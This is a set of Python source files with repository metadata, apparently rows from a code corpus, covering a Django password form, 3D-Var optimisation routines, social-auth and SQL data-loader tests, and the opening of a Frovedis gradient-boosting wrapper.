assert sp == 'test_pipeline_manager.example_class.stuff.data' | 42.548193 | 116 | 0.674029 | 2,831 | 21,189 | 4.636877 | 0.039915 | 0.179401 | 0.072675 | 0.038851 | 0.920545 | 0.894949 | 0.880018 | 0.865925 | 0.840786 | 0.814581 | 0 | 0.004177 | 0.243051 | 21,189 | 498 | 117 | 42.548193 | 0.814265 | 0.031054 | 0 | 0.740406 | 0 | 0 | 0.063755 | 0.034022 | 0 | 0 | 0 | 0 | 0.139955 | 1 | 0.056433 | false | 0 | 0.009029 | 0 | 0.072235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67be7c0304e326407cc64db173e0aa929cd4d2ad | 377 | py | Python | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
from django import forms
class PasswordChangeForm(forms.Form):
password = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
new_password = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
new_password_again = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
| 31.416667 | 61 | 0.689655 | 41 | 377 | 6.268293 | 0.439024 | 0.163424 | 0.233463 | 0.291829 | 0.735409 | 0.735409 | 0.735409 | 0.735409 | 0.529183 | 0.529183 | 0 | 0.012698 | 0.164456 | 377 | 11 | 62 | 34.272727 | 0.803175 | 0.034483 | 0 | 0.375 | 0 | 0 | 0.082873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.875 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
67e034d7b0c40ddccb0edc2dc9ac285e58b50511 | 17,440 | py | Python | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 4 | 2020-04-20T20:14:27.000Z | 2022-02-28T16:49:58.000Z | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 6 | 2019-03-06T02:03:44.000Z | 2020-08-04T17:07:12.000Z | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 1 | 2019-01-31T12:57:29.000Z | 2019-01-31T12:57:29.000Z | """Functions implementing 3D-Var.
Signatures follow the functions in
:mod:`atmos_flux_inversion.optimal_interpolation`
Note
----
Forces in-memory computations. BFGS method requires this, and there
are odd shape-mismatch errors if I just change to dask arrays.
Conjugate gradient solvers may work better for dask arrays if we drop
the covariance matrix from the return values.
"""
import scipy.optimize
import scipy.linalg
# I believe scipy's minimizer requires things that give boolean true
# or false from the objective, rather than a yet-to-be-realized dask
# array.
from numpy import asarray
from numpy import zeros_like
from atmos_flux_inversion import ConvergenceError, MAX_ITERATIONS, GRAD_TOL
from atmos_flux_inversion.util import solve, method_common
@method_common
def simple(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(x - x_0)^T P_B^{-1} (x - x_0) + (y - h(x))^T R^{-1} (y - h(x))
which has gradient
.. math::
P_B^{-1} (x - x_0) + H^T R^{-1} (y - h(x))
"""
def cost_function(test_state):
"""Mismatch between state, prior, and obs.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
float
A measure of the mismatch between the test state and the
background and observations
"""
prior_mismatch = asarray(test_state - background)
test_obs = observation_operator.dot(test_state)
obs_mismatch = asarray(test_obs - observations)
prior_fit = prior_mismatch.dot(solve(
background_covariance, prior_mismatch))
obs_fit = obs_mismatch.dot(solve(
observation_covariance, obs_mismatch))
return prior_fit + obs_fit
def cost_jacobian(test_state):
"""Gradiant of cost_function at `test_state`.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
prior_mismatch = test_state - background
test_obs = observation_operator.dot(test_state)
obs_mismatch = test_obs - observations
prior_gradient = solve(background_covariance,
prior_mismatch)
obs_gradient = observation_operator.T.dot(
solve(observation_covariance,
obs_mismatch))
return prior_gradient + obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
# Results
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, background,
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result)
if reduced_background_covariance is not None:
result.hess_inv = None
return result.x, result.hess_inv
@method_common
def incremental(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Use the change from the background to try to avoid precision loss.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(dx)^T P_B^{-1} (dx) + (y - h(x_0) - H dx)^T R^{-1} (y - h(x_0) - H dx)
which has gradient
.. math::
P_B^{-1} (dx) - H^T R^{-1} (y - h(x) - H dx)
where :math:`x = x_0 + dx`
"""
innovations = observations - observation_operator.dot(background)
def cost_function(test_change):
"""Mismatch between state, prior, and obs.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
cost: float
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_fit = test_change.dot(asarray(solve(
background_covariance, test_change)))
obs_fit = obs_mismatch.dot(asarray(solve(
observation_covariance, obs_mismatch)))
return prior_fit + obs_fit
def cost_jacobian(test_change):
"""Gradiant of cost_function at `test_change`.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_gradient = solve(background_covariance,
test_change)
obs_gradient = observation_operator.T.dot(
solve(observation_covariance,
obs_mismatch))
return prior_gradient - obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
# Results
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, asarray(zeros_like(background)),
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
analysis = background + result.x
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result, analysis)
if reduced_background_covariance is not None:
result.hess_inv = None
return analysis, result.hess_inv
@method_common
def incr_chol(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Use the change from the background to try to avoid precision loss.
Also use Cholesky factorization of the covariances to speed
solution of matrix equations.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(dx)^T P_B^{-1} (dx) + (y - h(x_0) - H dx)^T R^{-1} (y - h(x_0) - H dx)
which has gradient
.. math::
P_B^{-1} (dx) - H^T R^{-1} (y - h(x) - H dx)
where :math:`x = x_0 + dx`
"""
innovations = observations - observation_operator.dot(background)
from scipy.linalg import cho_factor, cho_solve
# factor the covariances to make the matrix inversions faster
bg_cov_chol_u = cho_factor(background_covariance)
obs_cov_chol_u = cho_factor(observation_covariance)
def cost_function(test_change):
"""Mismatch between state, prior, and obs.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
cost: float
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_fit = test_change.dot(cho_solve(
bg_cov_chol_u, test_change))
obs_fit = obs_mismatch.dot(cho_solve(
obs_cov_chol_u, obs_mismatch))
return prior_fit + obs_fit
def cost_jacobian(test_change):
"""Gradiant of cost_function at `test_change`.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_gradient = cho_solve(bg_cov_chol_u,
test_change)
obs_gradient = observation_operator.T.dot(
cho_solve(obs_cov_chol_u,
obs_mismatch))
return prior_gradient - obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
# Results
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, asarray(zeros_like(background)),
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
analysis = background + result.x
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result, analysis)
if reduced_background_covariance is not None:
result.hess_inv = None
return analysis, result.hess_inv
| 33.34608 | 79 | 0.652523 | 2,017 | 17,440 | 5.458106 | 0.128409 | 0.060405 | 0.044146 | 0.026978 | 0.900263 | 0.894723 | 0.874739 | 0.868017 | 0.864293 | 0.858661 | 0 | 0.001731 | 0.271216 | 17,440 | 522 | 80 | 33.409962 | 0.864437 | 0.590367 | 0 | 0.703704 | 0 | 0 | 0.019064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.051852 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c022443696d2f9a1e3ad8c2f64c7916461534f79 | 264 | py | Python | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 2 | 2020-12-30T11:21:43.000Z | 2021-12-04T16:25:53.000Z | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 2 | 2020-03-09T09:17:06.000Z | 2020-04-09T13:33:12.000Z | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 1 | 2022-03-06T06:22:21.000Z | 2022-03-06T06:22:21.000Z | from syft.serde.protobuf import proto
from syft.serde.protobuf import serde
from syft.serde.protobuf import native_serde
from syft.serde.protobuf import torch_serde
from syft.serde.protobuf.serde import serialize
from syft.serde.protobuf.serde import deserialize
| 33 | 49 | 0.852273 | 40 | 264 | 5.575 | 0.25 | 0.215247 | 0.349776 | 0.565022 | 0.838565 | 0.573991 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094697 | 264 | 7 | 50 | 37.714286 | 0.933054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c024479fad6845ad3554ebb9a0953ca3e3a63aa8 | 1,572 | py | Python | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | 56 | 2018-08-28T13:18:19.000Z | 2021-06-10T20:49:30.000Z | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | 4 | 2018-08-24T04:40:32.000Z | 2021-06-30T09:47:08.000Z | from rest_framework import status
from authors.apps.authentication.tests import BaseTest
class SocialAuthenticationTests(BaseTest):
def test_google_invalid_login(self):
response = self.client.post("/api/social/", self.google_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_invalid_provider_login(self):
response = self.client.post("/api/social/", self.invalid_provider, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_facebook_login(self):
response = self.client.post("/api/social/", self.facebook_login, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_facebook_invalid_login(self):
response = self.client.post("/api/social/", self.facebook_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_twitter_login(self):
response = self.client.post("/api/social/", self.twitter_login, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_invalid_twitter_login(self):
response = self.client.post("/api/social/", self.twitter_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_twitter_no_secret(self):
response = self.client.post("/api/social/", self.twitter_no_secret, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 46.235294 | 95 | 0.743639 | 204 | 1,572 | 5.45098 | 0.186275 | 0.044065 | 0.100719 | 0.138489 | 0.817446 | 0.817446 | 0.817446 | 0.817446 | 0.817446 | 0.736511 | 0 | 0.015556 | 0.141221 | 1,572 | 33 | 96 | 47.636364 | 0.808148 | 0 | 0 | 0.291667 | 0 | 0 | 0.071247 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 1 | 0.291667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c05ca69200f3f546ed27e985f347f36312a620cb | 6,442 | py | Python | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | 1 | 2022-02-25T16:11:34.000Z | 2022-02-25T16:11:34.000Z | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | null | null | null | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from datetime import date, timedelta
import re
from _pytest.monkeypatch import MonkeyPatch
from chaos_genius.core.utils.data_loader import DataLoader
from chaos_genius.databases.models.data_source_model import DataSource
def test_data_loader(monkeypatch: MonkeyPatch):
# TODO: Add filters for testing
kpi_info = {
"datetime_column": "date",
"id": 1,
"kpi_query": "",
"kpi_type": "table",
"metric": "cloud_cost",
"table_name": "cloud_cost",
"data_source": {},
"filters": "",
}
data_source = {
"connection_type": "Postgres",
"id": 1
}
@dataclass
class TestDataSource:
as_dict: dict
def get_data_source(*args, **kwargs):
return TestDataSource(data_source)
monkeypatch.setattr(DataSource, "get_by_id", get_data_source)
# table, end_date, start_date
end_date = date(2020, 1, 1)
start_date = date(2019, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query().strip()
# table, end_date, start_date, count
output_query = f"""select count(*) from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query(count=True).strip()
# table, end_date, start_date, tail
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert output_query == dl._build_query().strip()
# table, end_date, days_before
end_date = date(2020, 1, 1)
days_before = 30
start_date = end_date - timedelta(days=days_before)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query().strip()
# table, end_date, days_before, count
output_query = f"""select count(*) from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query(count=True).strip()
# table, end_date, days_before, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert output_query == dl._build_query().strip()
kpi_info = {
"datetime_column": "date",
"id": 1,
"kpi_query": "select * from cloud_cost",
"kpi_type": "query",
"metric": "cloud_cost",
"data_source": {},
"filters": "",
}
# query, end_date, start_date
end_date = date(2020, 1, 1)
start_date = date(2019, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, start_date, count
output_query = r"select count\(\*\) from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query(count=True).strip())
# query, end_date, start_date, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date,
tail=10
)
end_date = end_date + timedelta(days=1)
# output_query = f"""select * from (select * from cloud_cost) where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
# assert output_query == dl._build_query().strip()
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, days_before
end_date = date(2020, 1, 1)
days_before = 30
start_date = end_date - timedelta(days=days_before)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, days_before, count
output_query = r"select count\(\*\) from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query(count=True).strip())
# query, end_date, days_before, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert re.match(output_query, dl._build_query().strip())
| 38.118343 | 176 | 0.603074 | 894 | 6,442 | 4.098434 | 0.091723 | 0.126092 | 0.105076 | 0.099345 | 0.855076 | 0.837063 | 0.832151 | 0.827238 | 0.827238 | 0.807587 | 0 | 0.019581 | 0.215151 | 6,442 | 168 | 177 | 38.345238 | 0.705103 | 0.099814 | 0 | 0.755725 | 0 | 0.091603 | 0.33512 | 0.141103 | 0 | 0 | 0 | 0.005952 | 0.091603 | 1 | 0.015267 | false | 0 | 0.045802 | 0.007634 | 0.083969 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
225f6bc0f502788ec911d6926269f4beb162e02e | 125 | py | Python | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | null | null | null | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | 8 | 2019-12-07T13:13:34.000Z | 2021-09-02T03:07:25.000Z | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | null | null | null | from django import forms
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
| 31.25 | 54 | 0.856 | 18 | 125 | 5.833333 | 0.5 | 0.285714 | 0.285714 | 0.495238 | 0.742857 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112 | 125 | 3 | 55 | 41.666667 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
97f4ba594ee528c76d9b4cbd4ec4ef9ed238fd76 | 20,267 | py | Python | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 63 | 2018-06-21T14:11:59.000Z | 2022-03-30T11:24:36.000Z | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 5 | 2018-09-22T14:01:53.000Z | 2021-12-27T16:11:05.000Z | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 12 | 2018-08-23T15:59:44.000Z | 2022-02-20T06:47:22.000Z | """
wrapper of frovedis ensemble models - GBT
"""
import pickle
import os.path
import numpy as np
from ...base import *
from ...exrpc import rpclib
from ...exrpc.server import FrovedisServer, set_association, \
check_association, do_if_active_association
from ...matrix.ml_data import FrovedisLabeledPoint
from ...matrix.dtype import TypeUtil
from ..metrics import accuracy_score, r2_score
from ..model_util import M_KIND, ModelID, GLM
class GradientBoostingClassifier(BaseEstimator):
"""A python wrapper of Frovedis Gradient boosted trees: classifier"""
# max_bins: added
# verbose: added
def __init__(self, loss="deviance", learning_rate=0.1, n_estimators=100,
subsample=1.0, criterion="friedman_mse", min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, min_impurity_decrease=0.,
min_impurity_split=None, init=None,
random_state=None, max_features=None,
verbose=0,
max_leaf_nodes=None, warm_start=False,
presort="deprecated", validation_fraction=0.1,
n_iter_no_change=None, tol=1e-4, ccp_alpha=0.0,
max_bins=32):
self.loss = loss
self.learning_rate = learning_rate
self.n_estimators = n_estimators
